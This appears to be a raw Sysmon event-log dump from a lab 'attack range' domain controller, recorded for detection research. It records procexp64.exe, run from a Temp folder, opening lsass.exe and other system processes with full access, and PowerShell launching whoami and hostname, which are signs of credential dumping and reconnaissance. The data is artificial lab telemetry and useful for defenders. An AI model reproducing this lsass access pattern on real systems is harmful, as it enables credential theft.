15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790743Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790742Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790741Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790740Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790739Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790738Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790737Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790736Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790735Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790734Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790733Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790732Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790731Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790730Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790729Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790728Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790727Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790726Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790725Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790724Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790723Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.282{732C744F-31A3-6010-A3A2-00000000A301}64165800C:\Windows\system32\conhost.exe{732C744F-325F-6010-D7A2-00000000A301}7712C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790722Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.282{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790721Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.282{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790720Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.282{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790719Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.282{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790718Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.282{732C744F-17DF-600B-9401-00000000A301}50844476C:\Windows\system32\csrss.exe{732C744F-325F-6010-D7A2-00000000A301}7712C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000790717Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.282{732C744F-31A3-6010-A2A2-00000000A301}7260604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{732C744F-325F-6010-D7A2-00000000A301}7712C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22bd0a1b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220718a5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22071576|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22b22bdb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+2203210c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220905db|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073ad1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22065a56|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22071f89|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22071b25|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220718a5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22071576|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22b22bdb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+2203210c 154100x8000000000000000790716Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.289{732C744F-325F-6010-D7A2-00000000A301}7712C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000790715Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.267{732C744F-31A3-6010-A3A2-00000000A301}64165800C:\Windows\system32\conhost.exe{732C744F-325F-6010-D6A2-00000000A301}5392C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790714Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.267{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790713Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 